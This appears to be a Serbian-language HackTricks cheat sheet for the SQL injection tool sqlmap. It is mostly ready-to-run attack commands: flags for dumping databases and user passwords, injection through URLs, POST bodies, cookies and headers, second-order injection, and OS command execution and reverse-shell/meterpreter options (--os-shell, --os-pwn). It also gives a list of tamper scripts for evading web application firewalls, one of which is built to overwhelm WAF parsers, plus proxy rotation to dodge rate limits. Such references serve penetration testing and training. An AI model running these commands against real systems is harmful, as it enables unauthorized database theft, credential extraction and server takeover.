SQLMap

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Proverite planove pretplate!

Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.

Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

Osnovni argumenti za SQLmap

Generički

-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=PROXY

Zastavice tehnika (`--technique`)

Argument --technique određuje koje SQL injection metode će sqlmap pokušati. Svaki karakter u nizu predstavlja tehniku:

Letter	Technique	Description
B	Boolean-based blind	Koristi true/false uslove za zaključivanje podataka
E	Error-based	Iskorišćava opširne DBMS error poruke za eksfiltraciju rezultata
U	UNION query	Injektuje `UNION SELECT` iskaze da preuzme podatke putem istog kanala
S	Stacked queries	Dodaje dodatne naredbe odvojene znakom `;`
T	Time-based blind	Oslanja se na kašnjenja (`SLEEP`, `WAITFOR`) da otkrije injekciju
Q	Inline / out-of-band	Koristi funkcije kao što su `LOAD_FILE()` ili OOB kanale poput DNS-a

Podrazumevani redosled je BEUSTQ. Možete ih preurediti ili ograničiti, npr. samo Boolean i Time-based u tom redosledu:

sqlmap -u "http://target/?id=1" --technique="BT" --batch

Preuzimanje informacija

Interno

--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB

DB podaci

--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table  ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column

Mesto injekcije

Iz Burp/ZAP snimanja

Presretnite zahtev i kreirajte fajl req.txt

sqlmap -r req.txt --current-user

Injekcija GET zahteva

sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id

POST Request Injection

sqlmap -u "http://example.com" --data "username=*&password=*"

Injekcije u zaglavljima i drugim HTTP metodama

#Inside cookie
sqlmap  -u "http://example.com" --cookie "mycookies=*"

#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

#The injection is located at the '*'

Second order injection

python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs

Shell

#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami

#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell

#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn

Pretraži veb sajt sa SQLmap i auto-exploit

sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms

Prilagođavanje Injection

Postavite sufiks

python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "

Prefiks

python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "

Pomoć pri pronalaženju boolean injection

# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch

Tamper

--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper

Tamper	Opis
apostrophemask.py	Zamenjuje karakter apostrofa njegovim UTF-8 full width ekvivalentom
apostrophenullencode.py	Zamenjuje karakter apostrofa njegovim ilegalnim dvostrukim Unicode ekvivalentom
appendnullbyte.py	Dodaje enkodovani NULL bajt na kraj payloada
base64encode.py	Base64 enkodira sve karaktere u datom payloadu
between.py	Zamenjuje operator veće od (‘>’) sa ‘NOT BETWEEN 0 AND #’
bluecoat.py	Zamenjuje razmak posle SQL izraza sa validnim nasumičnim blank karakterom. Nakon toga zamenjuje karakter = operatorom LIKE
chardoubleencode.py	Duplo url-enkodira sve karaktere u datom payloadu (ne obrađujući već enkodirane)
commalesslimit.py	Zamenjuje instance poput ‘LIMIT M, N’ sa ‘LIMIT N OFFSET M’
commalessmid.py	Zamenjuje instance poput ‘MID(A, B, C)’ sa ‘MID(A FROM B FOR C)’
concat2concatws.py	Zamenjuje instance poput ‘CONCAT(A, B)’ sa ‘CONCAT_WS(MID(CHAR(0), 0, 0), A, B)’
charencode.py	Url-enkodira sve karaktere u datom payloadu (ne obrađujući već enkodirane)
charunicodeencode.py	Unicode-url-enkodira neenkodirane karaktere u datom payloadu (ne obrađujući već enkodirane). “%u0022”
charunicodeescape.py	Unicode-url-enkodira neenkodirane karaktere u datom payloadu (ne obrađujući već enkodirane). “\u0022”
equaltolike.py	Zamenjuje sva pojavljivanja operatora jednako (‘=’) operatorom ‘LIKE’
escapequotes.py	Escapuje navodnike kosom crtom (’ i ")
greatest.py	Zamenjuje operator veće od (‘>’) sa ekvivalentom ‘GREATEST’
halfversionedmorekeywords.py	Dodaje versionisani MySQL komentar pre svakog keyword-a
ifnull2ifisnull.py	Zamenjuje instance poput ‘IFNULL(A, B)’ sa ‘IF(ISNULL(A), B, A)’
modsecurityversioned.py	Obavija kompletan upit versionisanim komentarom
modsecurityzeroversioned.py	Obavija kompletan upit komentarom sa verzijom nula
multiplespaces.py	Dodaje više razmaka oko SQL keywords
nonrecursivereplacement.py	Zamenjuje unapred definisane SQL keywords njihovim reprezentacijama pogodnim za zamenu (npr. .replace(“SELECT”, “”)) filtera
percentage.py	Dodaje procentualni znak (‘%’) ispred svakog karaktera
overlongutf8.py	Konvertuje sve karaktere u datom payloadu (ne obrađujući već enkodirane)
randomcase.py	Zamenjuje svaki karakter keyword-a nasumičnim velikim/malim slovom
randomcomments.py	Dodaje nasumične komentare u SQL keywords
securesphere.py	Dodaje posebno konstruisan string
sp_password.py	Dodaje ‘sp_password’ na kraj payloada radi automatske obfuskacije u DBMS logovima
space2comment.py	Zamenjuje razmak (’ ’) komentarima
space2dash.py	Zamenjuje razmak (’ ‘) sa dash komentarom (’–‘) praćenim nasumičnim stringom i novim redom (’\n’)
space2hash.py	Zamenjuje razmak (’ ‘) sa znakom (’#‘) praćenim nasumičnim stringom i novim redom (’\n’)
space2morehash.py	Zamenjuje razmak (’ ‘) sa znakom (’#‘) praćenim nasumičnim stringom i novim redom (’\n’)
space2mssqlblank.py	Zamenjuje razmak (’ ’) nasumičnim blank karakterom iz validnog skupa alternativnih karaktera
space2mssqlhash.py	Zamenjuje razmak (’ ‘) sa znakom (’#‘) praćenim novim redom (’\n’)
space2mysqlblank.py	Zamenjuje razmak (’ ’) nasumičnim blank karakterom iz validnog skupa alternativnih karaktera
space2mysqldash.py	Zamenjuje razmak (’ ‘) sa dash komentarom (’–‘) praćenim novim redom (’\n’)
space2plus.py	Zamenjuje razmak (’ ‘) sa plusom (’+’)
space2randomblank.py	Zamenjuje razmak (’ ’) nasumičnim blank karakterom iz validnog skupa alternativnih karaktera
symboliclogical.py	Zamenjuje logičke operatore AND i OR njihovim simboličkim ekvivalentima (&& i \|\|)
unionalltounion.py	Zamenjuje UNION ALL SELECT sa UNION SELECT
unmagicquotes.py	Zamenjuje karakter navodnika (’) multi-bajt kombinacijom %bf%27 zajedno sa generičkim komentarom na kraju (da bi radilo)
uppercase.py	Zamenjuje svaki karakter keyword-a velikim slovima ‘INSERT’
varnish.py	Dodaje HTTP header ‘X-originating-IP’
versionedkeywords.py	Obuhvata svaki ne-funkcijski keyword versionisanim MySQL komentarom
versionedmorekeywords.py	Obuhvata svaki keyword versionisanim MySQL komentarom
xforwardedfor.py	Dodaje lažni HTTP header ‘X-Forwarded-For’
luanginxmore.py	Tamper samo za POST koji prethodi milionima dummy parametara da iscrpi Lua‑Nginx WAF parsere (npr. Cloudflare).

luanginxmore generiše ~4.2M nasumičnih POST parametara pre vašeg payloada; koristite ga samo sa --method=POST i očekujte velike veličine zahteva koje mogu oboriti slabo konfigurisane Lua-Nginx WAF-ove.

Nedavne opcije koje vredi omogućiti (>=1.9.x)

HTTP/2 transport: --http2 forsira sqlmap da koristi HTTP/2 (korisno protiv front-endova koji rate-limituju HTTP/1.1, ali opuštaju h2). Kombinujte sa --force-ssl da primorate HTTPS.
Proxy rotation: --proxy-file proxies.txt --proxy-freq 3 će rotirati kroz listu, menjajući proxy na svakih 3 zahteva da bi se izbeglo ograničavanje po IP-u.
Offline / purge modes: --offline ponovo koristi keširane podatke sesije bez kontaktiranja cilja (nula mrežnog saobraćaja), dok --purge bezbedno briše session/output direktorijum kad završite.
Mobile UA emulation: --mobile podstiče vas da spoof-ujete popularni smartphone User-Agent, korisno za API-je koji izlažu dodatna polja mobilnim klijentima.

Reference

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Proverite planove pretplate!

Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.

Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.